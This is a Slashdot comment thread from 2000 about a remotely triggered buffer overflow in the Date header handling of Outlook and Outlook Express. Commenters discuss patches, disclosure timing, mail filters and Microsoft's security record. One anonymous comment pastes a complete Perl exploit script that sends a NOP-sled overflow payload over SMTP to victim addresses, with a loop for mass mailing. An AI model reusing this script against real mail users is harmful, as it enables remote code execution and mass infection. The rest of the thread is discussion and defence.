    Oh, I can just whip up a little form in PHP on the departmental webserver and send everyone a URL where the form is.

    Geez...

    Why would I need scripting in my mail client?

  174. Other news stories on this vulnerability by nlvp · · Score: 3
  175. Re:The outlook scripting is for enterprise apps by CoolVibe · · Score: 1

    Why should I put data on your workstation, if your workstation can get its data from my central database or my LDAP server? Nice and centralized. *AND* I can change stuff with PHP (PHP has LDAP and support for various databases, including Oracle, Sybase, MSSQL, etc.)

    THIS IS WHY SCRIPTING IN CLIENTS IS UNNEEDED

    Cheers

  176. Nightmare Scenario by Militant+Apathy · · Score: 1

    Er, couldn't someone use this exploit to initiate a massive DOS attack on an arbitrary target, merely by sending out 10,000 e-mail messages?

    And what if lots of shithead kiddies tried this, with lots of targets?

    --

    GNU Info is documentation optimized for machine readability
  177. Re:Swiss cheezzz by skinnymofo · · Score: 1

    damn... isn't memory loss a sign of aging?? .

    --
    Happiness is like peeing yourself, only you can feel the warmth.
  178. inetcomm.dll by Stonehand · · Score: 1

    OK. So apparently updating IE to a version that provides a newer inetcomm.dll fixes this.

    This begs the obvious question -- since it's a DLL, are these (IE, Outlook, Outlook Express) the only ones that use whatever buggy functions allow this exploit? Or might other mail readers be vulnerable?

    --
    Only the dead have seen the end of war.
  179. it affects IE as well by oliverthered · · Score: 1

    I wrote a little virus thingy some time ago (a well behaved one), as a signed ActiveX control, the plan was (or wasn't) to seek out and infect web-servers with the virus and propagate it through IE and outlook, excel, word and access are also fun to create viruses for, especially the mutating encrypting kind.

    Seems like they've just realised this could be a problem. netscape, linux and a box of hankies to cry for those poor m$ bunnies that's what you need.

    if windows is a way of life I'd like to throw my life away.

    --
    thank God the internet isn't a human right.
  180. Ummm.... by sulli · · Score: 1
    It's the Outlook exploit. So if you don't have Outlook, you probably aren't affected. But you never know, those devious Microsofties just get into everything...

    sulli

    --

    sulli
    RTFJ.
  181. Re:Bugtraq by wilkinsm · · Score: 1

    Actually, that is an excellent link (http://phrack.infonexus.com/search.phtml?view&article=p49-14). I understood the technique in principle, but had never seen an actual example of how it works. Pretty hairy stuff - the people who play with this must like to crash their own machines often.

  182. secure languages? by Aardappel · · Score: 1

    When are people going to realise that problems like this could never have happened if things were programmed in a secure language (like *cough* Java, or I assume also C# soon) ? How many bugs/crashes/problems are caused by the fact that we insist on continuing to use C/C++?

  183. A little insight by rips · · Score: 1

    I'm the author of the original bugtraq post.

    My original post to bugtraq was not intended to happen yesterday. It was through some carelessness on my behalf that it got out (if you really must know, there's a post about it on the bugtraq mailing list).

    Both USSR Labs and I found the bug and submitted it to Microsoft independently. Unfortunately, due to my release of the advisory, Microsoft is refusing to acknowledge me in their official credits.

    The implications of this bug should be obvious to anyone. Being able to run code on someone else's machine without their input or realization puts this vulnerability some powers above the recent VB script worms by a large factor.

    The scariest thing about this problem, when I discovered it in early June, was the amount of time it took to find it. Not long after the ILOVEYOU worm had been spread, my Outlook session crashed. I had this strange urge to look for a way to crash outlook with a corrupted header (call me weird...). 10-15 minutes later I had isolated the problem and 5-8 hours of work after that I had a working exploit for it.

    I notified Microsoft in early July about the problem and had been keeping it to myself while they developed patches.

    Another thing the media didn't pick up on was that Outlook plugins such as PGP also seem to crash in the same DLL. I'm not sure what security implications this poses as I haven't looked into this one myself (again further info is on bugtraq) but it highlights the fact that you can't build something secure out of insecure components!

  184. All versions of Outlook are vulnerable by pen · · Score: 1
    All versions of Outlook are vulnerable, including Outlook 97-2000 and Outlook Express 4.0-5.5. Linkety-link (click the different buttons on the top, too).

    --

  185. Re:Bugtraq by Chalst · · Score: 2

    Quite so. I should have said: countless remote root exploits, all of which could be used to create worms.

  186. Re:More Microsoft Bashing.. how sad by neb · · Score: 1

    You have got to be kidding me.

  187. Re:Bugtraq by rips · · Score: 1

    Just a quick correction.

    Versions of Outlook set up in Corporate/Group mode aren't affected. MS Exchange clients also aren't affected. This bug will only really affect POP3 and IMAP4 mail users.

  188. Macjunkie by katzman_NJ · · Score: 1

    Looks like themacjunkie.com went as far as removing their story but also their whole site. If you go to themacjunkie.com you go to a web hosting company's website instead of theirs. What a wimp, when he's wrong he runs.

    --
    http://www.terratoday.com - Environmental news, discussions & more!
  189. The new one is worse by tilly · · Score: 2

    Very, very busy.

    I just do not have a site available that does such a good job dissecting it...

    Cheers,
    Ben

    --
    My usual seat in the cluetrain is at http://pub4.ezboard.com/biwethey.ht
  190. Re:Quick fix for Outlook Express users by RayChuang · · Score: 2

    I think you -better- read that bulletin again.

    According to this web page:

    http://www.microsoft.com/technet/security/bulletin/MS00-043.asp

    the bulletin specifically states that if you do a default installation of Internet Explorer 5.01 Service Pack 1 or Internet Explorer 5.5, this will automatically install and/or upgrade to Outlook Express 5.5. Microsoft has specifically stated that OE 5.5 is -not- vulnerable to the issue that USSR Labs discovered. It should be noted that if you are running Windows 2000, you may have to apply the patch (which is now available) or do a manual upgrade to OE 5.5.

    --
    Raymond in Mountain View, CA
  191. more info by billnapier · · Score: 1

    I personally thought the article was lacking in details, so here is the Security Focus bug report that goes into many more details (exploit included).

  192. Re:Quick fix for Outlook Express users by GodSpiral · · Score: 1

    If you read the MS page closer you would have noticed that both 5.01 and 5.5 are vulnerable if you install Outlook Express.

    All versions of OE past 4.0 are vulnerable.

  193. nothing to do with flexibility by kaisyain · · Score: 3

    This current exploit has nothing to do with flexibility. I bet if 95% of the world used Eudora, you'd be hearing more about its buffer overflows.

  194. A New One I Just Found by Metrol · · Score: 2

    This may be old news to some of you, but I just recently discovered this one. Had one of my users bring me his laptop with a variety of problems on it. Had the usual glitches that form up after a while on Win98, but one of them was especially interesting.

    His Netscape kept loading up this GoHip web site as its default home page. Even going into the preferences in NS would only change this until the next re-boot. Had me poking around all over his system trying to figure out how his default home page kept getting changed. I couldn't find anything in the registry or .ini files that looked to be starting up that was out of the ordinary.

    I then popped on over to this GoHip web site to have a look. Right on their front page is a link that states something like "Make GoHip your default home page". The clever bit was that this was not a link to some how-to about preferences. It linked directly to a .reg file. This site was able to tweak registry entries directly from the web!

    Once I managed to download this .reg file to my local PC I was then able to trace back what all it had changed and get this thing off his system. I knew Windows had some security problems, but I had no idea it was THAT open to an attack.

    Now just imagine sending someone an E-Mail with an embedded meta tag that redirected you to some .reg file you've got mirrored on a number of free web hosts. Heck, all I'd have to do at that point is delete the file association to .exe and .com files, which is just two lines of the registry, and I'd have your system rendered useless.

    Mind you, I strongly disagree with this monopoly case that is presently going on. The details of this I'll save for later. On the other hand, I would have no problems at all with Microsoft being held criminally liable for gross negligence. None of what I'm talking about here is a secret to Microsoft, and still they continue to put out a known faulty product. How long do you think folks would put up with flaws like this from Ford, Honda, or any other car maker?

    --
    The line must be drawn here. This far. No further.
  195. outlook just cant be fixed by wrenling · · Score: 2

    And I think its time that MS admitted that. The program is too full of holes, too badly designed, to continue. It should be scrapped, period.

    The likelihood of MS actually admitting the above, let alone following through with my suggestion, is nil. But I think the fact that the hole has been a KNOWN exploit since June 11th and a patch was not made available even a MONTH later is very telling.

    Truly, this hole longer than that.. wasn't there a whitepaper about 6 months ago from the authors behind BackOrifice detailing how this kind of exploit was possible?

    --
    Check out Magic Firesheep!
    1. Re:outlook just cant be fixed by mizhi · · Score: 1
      Yeah. But microsoft thinks that just throwing money at it will be a solution.

      A random thought:

      If a million microsoft programmers worked at a million workstations would the entire microsoft software library eventually be produced, bug free?

      --
      Humorless sig goes here.
  196. Swiss cheezzz by skinnymofo · · Score: 1

    After reading about all the security holes in Outlook I am forced to ask a rhetorical question: What the f^ck were they thinking???

    --
    Happiness is like peeing yourself, only you can feel the warmth.
  197. Bugtraq by TheTomcat · · Score: 5

    Link on securityfocus is here

    Also, bugtraq archived here

    Now, to avoid everyone calling me a karma whore, here's my insight on the whole thing:

    USSR labs decided that they would hold back details until MS produced a fix. Understandable, I mean, they wouldn't want everyone to be developing exploits for the vulnerability while MS sits on it (Yes, I understand that security through obscurity doesn't work, but I'm sure that USSR would've released details if MS had refused to comply in a timely fashion). Anyway, I think that the problem is people actually getting/using the patch.

    Sure, sysadmins will probably do corporate work to clear this up, but people do worse jobs maintaining software than they do their cars. At least with cars, they know that the oil needs to be changed every 5000 or so KM, and that when the tread on the tires is bare, those need to be replaced. People are still using IE 3.0! Users are generally too lazy to upgrade software, even if there's a known security issue.

    That said, I'm as guilty as most of them.

    1. Re:Bugtraq by z4ce · · Score: 3

      The SANS alert does not apply to this exploit... I think Microsoft has outdone themselves on the "the most serious exploit ever" all in the same week. That has to be some kind of record.

    2. Re:Bugtraq by NetCurl · · Score: 1

      Yes, that may be the end result, but I was referring to the reason why the code is able to execute to begin with. No code should be executed upon email download unless the user specifically makes an action to do so.

      --

      It's only when we've lost everything, that we are free to do anything...

    3. Re:Bugtraq by NetCurl · · Score: 2

      "Anyway, I think that the problem is people actually getting/using the patch."

      I don't think that is the root of the problem. I think that the problem (considering strictly the Microsoft OS development, not Linux/Unix or anything else) stems from the fact that Microsoft tries to shove too many of these useless active features down the throats of the standard install people who buy their PC from OfficeMax. ActiveX is crap, all the stupid Microsoft proprietary stuff that breeds these security breaches should be curtailed. There shouldn't be huge gaping holes in major packaged components of the Microsoft OS.

      If they truly innovate, they shouldn't make these mistakes. This SANS alert goes into more detail about the security hole. Turns out MS's software engineers actually make a series of calls out of order that preempts whatever the user chooses to do. Why does this crap get released?

      --

      It's only when we've lost everything, that we are free to do anything...

  198. Actually Eudora is much safer by PYK · · Score: 2

    This flaw is not relegated to Outlook only - any email client which uses the IE engine to display HTML content (Eudora is one such mail client) leaves the door open for this exploit

    Two points: If you had read any of this, you would know that the problem is in the transport mechanism of Outlook (the components) - NOT the displaying of the text. Eudora uses its own system for that. Eudora CAN (in the later versions) use the MSIE engine to display message (for the extended HTML parsing), but it doesn't HAVE to do this, it's a feature users can set as they please.

  199. Flaw, Bug or marketing ploy? by Tsujigiri · · Score: 1
    Hmmm, I don't know about the rest of you but this seems a little odd to me. A serious flaw in their Email client that requires an upgrade to their latest Web browser to fix.

    Could it be that they're using email virus warnings to increase the install base of IE 5.5?

    Think about it people!

    --

    "I'll take the red pill. No! Blue! AAAaaaahhhhhhhhh"
    - Monty Python meets the Matrix

  200. This email will self destruct in 30 seconds by dattaway · · Score: 2

    Novell's Groupwise has a neat little date field exploit. It doesn't crash or anything, but if you set the date to the distant past, say, the year of 1985, the message will seemingly "self destruct" after it was read and shuffle itself at the end of the mail spool. It's a cool trick if you want a message to disappear after someone reads it. In the spirit of Inspector Gadget (the cartoon, not the stupid movie,) include the quote, "This message will self destruct in 30 seconds."

    Anyhow, for more fun, take a look at the source for msnbc's article. It is one HUGE mess of scripting for a short little article. What are they trying to hide in there? Easter eggs? Why all the features for just a damn story?

    1. Re:This email will self destruct in 30 seconds by Anonymous Coward · · Score: 1

      IF YOU EVER MAKE FUN OF INSPECTOR GADGET THE MOVIE I WILL KICK YOUR ASS.

    2. Re:This email will self destruct in 30 seconds by jari · · Score: 1

      He he. More fun can be had with Netscape Messenger in a similar vein.

      If you're on a Windows machine, try setting the clock forward to something like 2100, or "go large" up to 2400 etc. Lots of things break when you do this.

      Or set it to something it can handle - like 2021 ;) then send mails. Opposite of self destruct for those filtering on date. Whatever comes in that mail just sits there at front of the queue

  201. Re:More Microsoft Bashing.. how sad by OnyxRaven · · Score: 2

    Someone didn't read the whole thing. The major vulnerability is malformed date tags that Outlook reads BEFORE the user can even get to them. Insanely large numbers in that date field cause a buffer overflow. This is only a userland problem in the way that they are using Outlook.

    --
    --onyx--
  202. Microsoft trades an advertising bar for security by aceop · · Score: 1

    Yes, for those of us with hotmail accounts through Outlook Express, when you add the patch, what is also included? A blasted advertising bar!!!! I'm really pissed now.

    --
    Arm thy Pens; Guard thy words; Defend thy Mind

  203. I read this by josepha48 · · Score: 2
    It seems that Windows is also susceptible to buffer overruns. It is good that they already have fixes for some of the programs, but they need to escalate fixing the problem quickly, before some hacker decides to create another virus. Let's see how long this takes them to get a fix for the rest of their versions. If it is more than a week they are moving too slow. If it is a matter of telling people to upgrade then that is what they should do. Linux and other UNIXes do this all the time.

    send flames > /dev/null

    --

    Only 'flamers' flame!

  204. Re:It's about time by dr_eaerth · · Score: 1

    Viruses cannot be contained in image files, sound files, video clips, or other file formats, only executable binaries - still technically true, but thanks to Microsoft's "hide extensions of known types" feature, you can see viruses like "innocent_file.jpg.vbs", which appears in Microsoft clients as "innocent_file.jpg". Launching this file will, of course, trigger the virus.

    And we don't even need to hide extensions, because even with extensions set to be visible, .shs (scrap) extensions are hidden. This is a bug which Microsoft has never patched, even though it's been known for at least a year.
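
The hidden-extension behaviour described in the comment above, as an added Python example that is not part of the thread: it computes the name the shell would show for each attachment and flags runnable files whose visible name ends in a data-file extension. Apart from .vbs and .shs, the extension sets are assumptions made here, as are the function names and the constructed sample message.

```python
import email
import ntpath
from email import policy
from email.message import EmailMessage

# Extensions the Windows shell runs on double-click (illustrative subset, assumed here).
RUNNABLE = {".vbs", ".vbe", ".js", ".wsf", ".exe", ".com", ".bat", ".scr", ".pif", ".shs"}
# Hidden even when extensions are set to be visible; the comment names .shs.
ALWAYS_HIDDEN = {".shs"}
# Data-file extensions a recipient is likely to treat as harmless (assumed list).
DECOYS = {".jpg", ".gif", ".bmp", ".txt", ".doc", ".wav", ".avi", ".mpg"}


def displayed_name(filename: str, hide_known_types: bool = True) -> str:
    """Name as shown to the user, with or without 'hide extensions of known types'."""
    stem, ext = ntpath.splitext(ntpath.basename(filename))
    ext = ext.lower()
    registered = ext in RUNNABLE or ext in DECOYS
    if ext in ALWAYS_HIDDEN or (hide_known_types and registered):
        return stem
    return stem + ext


def classify(filename: str) -> str:
    """'ok', 'runnable', or 'masquerade' (runnable file posing as a data file)."""
    stem, ext = ntpath.splitext(ntpath.basename(filename))
    if ext.lower() not in RUNNABLE:
        return "ok"
    inner = ntpath.splitext(stem)[1].lower()
    return "masquerade" if inner in DECOYS else "runnable"


def scan_attachments(raw: bytes) -> list:
    """Return (real name, shown with hiding on, shown with hiding off, verdict)."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings = []
    for part in msg.walk():
        name = part.get_filename()
        if not name:
            continue
        verdict = classify(name)
        if verdict != "ok":
            findings.append((name, displayed_name(name),
                             displayed_name(name, hide_known_types=False), verdict))
    return findings


def build_sample() -> bytes:
    """Constructed test message; attachment bodies are inert placeholder bytes."""
    msg = EmailMessage()
    msg["From"] = "a@example.org"
    msg["To"] = "b@example.org"
    msg["Subject"] = "photos"
    msg.set_content("see attached")
    for name in ("holiday.jpg", "innocent_file.jpg.vbs", "report.doc.shs", "setup.exe"):
        msg.add_attachment(b"placeholder", maintype="application",
                           subtype="octet-stream", filename=name)
    return msg.as_bytes()


if __name__ == "__main__":
    for finding in scan_attachments(build_sample()):
        print(finding)
```

A gateway would quarantine the "masquerade" results and apply local policy to the plain "runnable" ones.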

  205. Sendmail 8.11 filter to stop this. by Koos · · Score: 1

    I've written a filter for sendmail 8.11 with MAP_REGEX which can stop Date: lines longer than 60 chars. Since I don't think tabs survive /. entry fields, only the URL. Available from http://www.cetis.hvu.nl/~koos/outlookoverflow.txt.
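
A mail-side check in the spirit of the sendmail filter mentioned above, as an added Python example (not Koos's filter and not part of the thread). It applies the 60-character limit to the unfolded Date header and also rejects values that are not printable ASCII or do not parse as an RFC 822 date; the function names, reason codes and sample messages are constructed for illustration.

```python
import re
from email.utils import parsedate_tz

MAX_DATE_LEN = 60  # limit quoted in the comment above, applied to the whole "Date: ..." header


def unfolded_headers(raw: bytes):
    """Yield (lower-cased name, value) for each top-level header.

    Continuation lines (starting with space or tab) are joined to the header
    they continue, so length is measured on the logical header, and anything
    after the first blank line (the body) is ignored.
    """
    head = re.split(rb"\r?\n\r?\n", raw, maxsplit=1)[0]
    logical = []
    for line in re.split(rb"\r?\n", head):
        if line[:1] in (b" ", b"\t") and logical:
            logical[-1] += line
        else:
            logical.append(line)
    for line in logical:
        name, _, value = line.partition(b":")
        yield name.strip().lower(), value.strip()


def date_header_problems(raw: bytes) -> list:
    """Return reason codes for rejecting the message; an empty list means accept."""
    dates = [v for n, v in unfolded_headers(raw) if n == b"date"]
    problems = []
    if len(dates) > 1:
        problems.append("multiple_date_headers")
    for value in dates:
        if len(b"Date: ") + len(value) > MAX_DATE_LEN:
            problems.append("too_long")
        # Only printable ASCII and tab belong in a date value.
        if any((c < 0x20 and c != 0x09) or c > 0x7E for c in value):
            problems.append("bad_bytes")
            continue
        try:
            parsed = parsedate_tz(value.decode("ascii"))
        except (ValueError, IndexError, TypeError):
            parsed = None
        if parsed is None:
            problems.append("unparseable")
    return problems


# Constructed sample messages (not captured traffic).
GOOD = (b"From: a@example.org\r\nTo: b@example.org\r\n"
        b"Date: Tue, 18 Jul 2000 13:15:21 -0400\r\nSubject: hi\r\n\r\nbody\r\n")
LONG = GOOD.replace(b"-0400", b"+" + b"1" * 80)
FOLDED = GOOD.replace(b" 13:15:21 -0400", b"\r\n 13:15:21\r\n +" + b"1" * 50)
BINARY = GOOD.replace(b"-0400", b"\x80\xff")
VAGUE = GOOD.replace(b"Tue, 18 Jul 2000 13:15:21 -0400", b"yesterday")
DUPLICATE = GOOD.replace(b"Subject: hi",
                         b"Date: Tue, 18 Jul 2000 13:15:21 -0400\r\nSubject: hi")
IN_BODY = GOOD + b"Date: " + b"1" * 200 + b"\r\n"

if __name__ == "__main__":
    for label, sample in [("good", GOOD), ("long", LONG), ("folded", FOLDED),
                          ("binary", BINARY), ("vague", VAGUE),
                          ("duplicate", DUPLICATE), ("in body", IN_BODY)]:
        print(label, date_header_problems(sample) or "accept")
```

In the FOLDED sample every physical line is shorter than 60 bytes, so the limit only triggers because the header is measured after unfolding.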

  206. Re:More Microsoft Bashing.. how sad by Phr3n3tik · · Score: 1

    Nope. Nice troll tho'....

    --
    -------------------- Hmmm... what does this button d
  207. THE EXPLOIT IS HERE! by Anonymous Coward · · Score: 1

    #!/usr/bin/perl
    #*********************************************** *******************************
    #http://www.ussrback.com Ussr Labs (Exploiteable Buffer Overflow)
    # Outlook Express 5.0 | Outlook 2000 | Outlook 97.0 | Outlook 98
    #*********************************************** *******************************
    #
    # By: Ussr Labs
    #
    # Arbitary shellcode injector over SMTP
    # ./$0 -h <server hostname> -m <mail>
    # ./dieoutlook.pl -h <smtp server> -m victim@address.com
    #
    #
    #
    #For Multiple email's Spanwn do something like this:
    #
    # for i in `cat emailshere.txt`; do perl ./outoutlook.pl -h smtpserverip -m $i; done
    #
    #
    #
    #

    use Getopt::Std;
    use Socket;
    getopt('h:m', \%args);

    # user defined variables
    if(defined($args{h})){$serv=$args{h}}else{&usage ;}
    if(defined($args{m})){$rcpt=$args{m}}else{&usage ;}

    # These are the escape characters which will cause the seg violation.
    # *nix didn't like the ascii interpretation, so we send the
    # characters in hex.
    # +,1 ,^ ,z , ,x

    $spawn = "\x2b\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\ x31\x31\x31\x31" .
    "\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\ x31\x31\x31\x31" .
    "\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\ x31\x31\x31\x31" .
    "\x31\x31\x31\x31\x31\x31\x31\x31\x5a\xdc\xae\x20\ x78\x0d\x0a";

    $ret = "00aedc5a"; # return address
    $nop = "\x90"; # x86 NOP
    $port = 25; # default 25 SMTP port
    $buffsize = "1348"; # buffer size
    $buffer .= $nop x 945; # load $buffer with 945 NOP then $shellcode
    $buffer .= $shellcode; # append shellcode to buffer
    $offset = (hex $ret); # return hex string to corresponding value
    $code = pack("N", $offset); # big-endian (long) network order
    while (length $buffer < $buffsize) { $buffer .= $code; }
    $buffer .= "\n\n";
    print "$code\n";

    # create random MAIL FROM field. format is: [ alphanumeric ] @ [ characters ] . [ domain ]

    $max=(int rand 15);
    @a=('a'..'z', '1'..'10'); for (1..$max) { $str .= $a[rand @a] }
    @a=('a'..'z'); for (1..$max) { $host .= $a[rand @a] }
    @dom = ('.com', '.net', '.org');
    $rdom = $dom[ rand @dom ];
    $rmail = $str . "@" . $host . $dom;
    print "random address set to: $rmail\n";

    # random date method, format: Date: <day>, <int-day> <month> 2000 <time>

    @days = ('Mon', 'Tue', 'Wed', 'Thu', 'Fri', 'Sat', 'Sun');
    $rday = $days[ rand @days ];
    $rcal=(int rand(31));
    $rhour=(int rand(23)); if ($rhour < 10){ $rhour = "0".$rhour; }
    $rmin=(int rand(59)); if ($rmin < 10){ $rmin = "0".$rmin; }
    $rsec=(int rand(59)); if ($rsec < 10){ $rsec = "0".$rsec; }
    @months = ('Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Oct', 'Sep', 'Nov', 'Dec');
    $rmonth = $months[ rand @months ];
    $date = "Date: ".$rday.","; if ( $rcal >9 ){$date = $date."$rcal"." $rmonth"." 2000 ".$rhour.":".$rmin.":".$rsec," ";}
    else { $date = $date." $rcal"." $rmonth"." 2000 ".$rhour.":".$rmin.":".$rsec," ";}
    print "date set to: $date\n";

    $in_addr = (gethostbyname($serv))[4] || die("Error: $!\n");
    $paddr = sockaddr_in($port, $in_addr) || die ("Error: $!\n");
    $proto = getprotobyname('tcp') || die("Error: $!\n");

    socket(S, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
    connect(S, $paddr) || die("Error: $!\n");
    select(S); $| = 1; select(STDOUT);

    # begin our SMTP transaction

    print "now starting SMTP transaction\n";
    $res=<S>; print "$res\n";
    print "sending HELO\n";
    system("sleep 2s");
    print S "HELO\r\n";
    $res=<S>; print "$res\n";

    print "sending MAIL FROM\n";
    system("sleep 2s");
    print S "MAIL FROM:$rmail\r\n";
    $res=<S>; print "$res\n";

    print "sending RCPT\n";
    system("sleep 2s");
    print S "RCPT TO:$rcpt\r\n";
    $res=<S>; print "$res\n";

    print "sending DATA\n";
    system("sleep 2s");
    print S "DATA\r\n";
    $res=<S>; print "$res\n";

    print "sending escape characters\n";
    print S "$date";
    print S " $spawn";

    print "sending shellcode\n";
    print S "$shellcode\r\n\r\n\r\n";
    #$res=<S>; print "$res\n";
    print S ".\r\n";
    print S "QUIT\r\n";

    print "shellcode spawn was successful\n";
    close(S);

    sub usage {die("\n\n./$0 -h <hostname> -m <mail>\n\n");}

  208. Security certification needed? by gunne · · Score: 2

    Ouch!
    This is the second time in a week I've been burned (had to do extra work) by security flaws found in Microsoft programs.
    I've been thinking about the need for a standards organization, or certification authority, for some time now. The question is; how would you set up such an organization, and would you trust it?
    An analogy: All of the major e-commerce sites on the web today buy their SSL certificate from one of the big CA:s, VeriSign for one, because that's a trusted entity.
    Wouldn't big program houses be interested in getting their applications branded "Secure" by a likewise trusted authority? (think CERT) My guess is yes. Microsoft, for example, would benefit (at least in large, mission critical installations) from having their source code audited and confirmed by a third party.
    When we have open source, most problems are found early (many eyeballs make shallow bugs) but not all. Think of the Wuftpd exploit last month. Is there, perhaps, even a need for an open security auditing organization?

  209. Buffer overflow errors by Felinoid · · Score: 1

    Buffer overflows are normal bugs. Meaning they are very easy to make.
    They are also easy to find and fix.

    Here is where my gripe starts...
    Apple, Sun, Linux etc all can be forgiven if they have an occasional overflow defect. It's pretty normal and they do eventually catch and fix those bugs.

    Microsoft unlike the rest lives in a "it works ship it" world. This gripe of course is nowhere near isolated to this one issue.
    However this is where it gets more blatant than others.
    One programmer could miss this bug and pass it on. Microsoft has people checking code for this sort of thing. If that phase was worth anything this bug would have been caught. However so many other bugs would have been caught as well. But this one is far too easy to catch.
    In the end the bug trap phase of MS Windows is worthless.

    This does not prove MsWindows is garbage. It's a normal bug. It can happen to anyone. It proves that the bugtrap phase is really a rubber stamp phase. It says Microsoft has a department purely so they can say they produce better than the open source "many eyes".
    But this kind of bug doesn't need many eyes to find and fix. It only needs one pair of eyes.
    Microsoft has those eyes... they are closed...

    It's a normal bug... it can happen to Linux, MacOS, BSD or Solaris. But it can also be removed. Those who have bug trap departments can be reasonably sure such a bug would never see the light of day. Those in the open source can be fairly sure such a bug will have a short life span.

    --
    I don't actually exist.
  210. Just publishing a patch isn't going to fix this... by StevenMaurer · · Score: 4

    The problem with real security issues like this one is the number of people who fail to keep up to date on all the latest patches. The infamous Morris worm, for instance, was essentially nothing more than a collection of exploits that had already been published and worked around. It's just that the relatively clueful, but overworked SysAdmins, hadn't installed them yet.

    I shudder to think how many clueless MS users will be out there with this vulnerability - even five years from now.

  211. NT BugTraq report by z4ce · · Score: 2

    It is HERE

  212. Funny thing is... by Kozz · · Score: 1

    When installing the IE 5.01 SP 1, the default settings include an option that installs Visual Basic Scripting support...

    *scratches head*



    Quidquid latine dictum sit, altum viditur.

    --
    I only post comments when someone on the internet is wrong.
  213. It's about time by Grant+Elliott · · Score: 2

    Why is this the first internet virus that someone with a brain could actually fall for? Why did it take this long? It seems to me that most virus writers have been bent on having fun without risking a lengthy jail sentence. As a result, we have nothing but these little cheap worms that still cause an incredible amount of damage. Can you imagine the damage if this thing wormed? And yet, even if this bug actually gets exploited, I doubt it will be malicious. It will probably end up in the advertising method described in the article. Cheap thrill.

    But at this point in time, one individual could probably bring down the entire internet and then some. Imagine what would happen if someone used this bug to load a CIH-type virus on every computer. Suddenly, the majority of the world's computers go out simultaneously. It'd be mass destruction - and virtually untraceable. (Can you imagine what would have happened if someone did this on Jan 1?)

    But I don't think any of this will ever happen. I'm sure there will always be a way, but there's no one out there crazy enough to actually do it. Virus writers want cheap thrills. Just because the hole is there, doesn't mean anyone will exploit it. We may never see the doomsday virus everyone's worried about for the last decade....

    --

    "I believe that a scientist looking at nonscientific problems is just as dumb as the next guy." -Richard Feynman

    1. Re:It's about time by patreides · · Score: 1

      "Can you imagine the damage if this thing wormed?"
      "...one individual could probably bring down the entire internet and then some."

      Now that's what I call natural selection.

      Of course since most of the Web Servers run Apache I doubt it would do much damage to the internet itself, just increase bandwidth on bad email servers, killing them (I imagine that would happen to those running sendmail especially, since it forks itself), and killing people's Windows boxes if they're actually using Outlook. One more reason to use mutt. :-)

      --
      # debian/rules
  214. Oops by Robert+Link · · Score: 2
    I believe I see now. I had been reading "June 11" as "July 11". An entire month for a patch does seem rather a long time, and certainly out of line with "standard practice".


    -rpl

  215. $500 reward by MousePotato · · Score: 1

    I submitted this story yesterday. It was extremely critical of M$ (...well for a cnet story). Here is an article by SANS regarding the problem and a $500 reward for the first person to come up with an automated fix in the form of a virus to inoculate against the security problem. It seems like a novel approach to the problem. I wonder if anyone actually figures out how to do this.

  216. What worries me most by Phil+Eschio · · Score: 1

    Is how Microsoft can let their program be so reckless and promiscuous in terms of security. Here we are, with a big, gaping backdoor hole (and not the first one either) in Outlook, and they take an ex post facto attitude to it. Normally I would protest the Slashdot media whore mentality, but when Microsoft seems so lax to the idea of using protection, I feel it is one of the cases where such a mentality is justified.

    We can just be fortunate that the wide open hole was discovered prematurely before it could be suddenly torn apart and violated by the efforts of malicious crackers. The possibility that one cracker could use e-mail to forcibly penetrate the hole in Outlook and spread its malicious, destructive seed deep inside a user's computer is absolutely frightening. I only hope word of this giant hole gets out to the public before it can be used and exploited by ill-willed coders.

    I am not a great fan of the open source community, but I will say this in their favor. When source code is left wide open to be poked and prodded by thousands of desiring coders, it provides quicker and better stimulation for improvement. Such crawling bugs and gaping holes are rarely discovered out of nowhere in open source software, because of the continual penetration and examination of the source code that occurs in that software paradigm. Hell, we would not have found out about Outlook's newest backdoor entry point in advance unless some benevolent hackers had rammed their way into the hole and pointed it out to Microsoft and the press.


    "The most fortunate of persons is he who has the most means to satisfy his vagaries."

    --


    "The most fortunate of persons is he who has the most means to satisfy his vagaries."
    - Marquis De Sade
  217. M$NB$ has some date flow problems of its own by dbthomas · · Score: 1
    Q: M$NB$ had the story for a month and held on to it? Then they announce the hole before M$ has the patch? Why the fsck didn't they just hold the story for one more day?

    A: They held on to the story because M$ is their parent and they fear unemployment more than they fear a shitty journalistic reputation. Holding a story for corporate interests is just as bad as the story two days ago about Forbes expecting a reporter to give up sources' names. I have a feeling M$NB$ was forced to announce the hole a day early because their scoop was being threatened by another news source.

    BThomas

    --
    "These are the days that must happen to you." -Walt Whitman
  218. The total skinny by drinkypoo · · Score: 2

    This particular vulnerability is kind of amusing. UNIX types have been suffering with buffer overflows for a long time now that have done some nasty things, like giving someone remote root.

    In any case, it's pretty lame of M$ to be seeing people fix all their buffer 'sploits on unix-centric applications and then not fix them in an obviously vulnerable location in their own code.

    This is especially amusing since they just released that gigantic patch that will ask you before it executes content in an attachment or embedded in a document. They fixed that, but they missed the buffer overflow. All I have to say is HA HA HA. :)

    No wait, I have more to say: Mozilla mail ownz j00!

    --
    "You're right," Fisheye says. "I should have set it on 'whip' or 'chop.'"
  219. Why did they wait so long to announce it? by mrogers · · Score: 1
    Why did they wait until July 19th to release a fix for a hole discovered on June 11th? Here's why. From the Microsoft security bulletin:

    The vulnerability can be eliminated by a default installation of either of the following upgrades:

    Internet Explorer 5.01 Service Pack 1.

    Internet Explorer 5.5 on any system except Windows 2000

    They were waiting for IE5.5 to be released so that they could persuade panicky sysadmins to upgrade to IE5.5. I'm sure many admins place a low priority on upgrading from IE3, IE4 or Netscape, but with this security fix Microsoft can hurry things along a bit. And the more people use a Microsoft browser, the more MS can "embrace and extend" web standards. Their long-term strategy of moving to web-based applications (see the recent announcement of the .NET platform) depends on widespread adoption of browsers which recognise MS extensions.

    $ cat < /dev/mouse

  220. The bill to Bill.G from Bill.C by ukscott · · Score: 1

    Dear Bill,

    We, at the Government of the United States, have come up with this reasonable figure for the latest wave of damage by your software to the economy of the world. Here is the breakdown:

    Number of times windows crashed on me last year (30)

    X

    Amount of space required for install (600)

    X

    Ram requirement (32)

    X

    Confirmed bugs (64,000)

    X

    Cost of product (200)

    X

    Number of bad hair days you have had on public TV (400).

    This gives a total bill of:

    $2,949,120,000,000,000

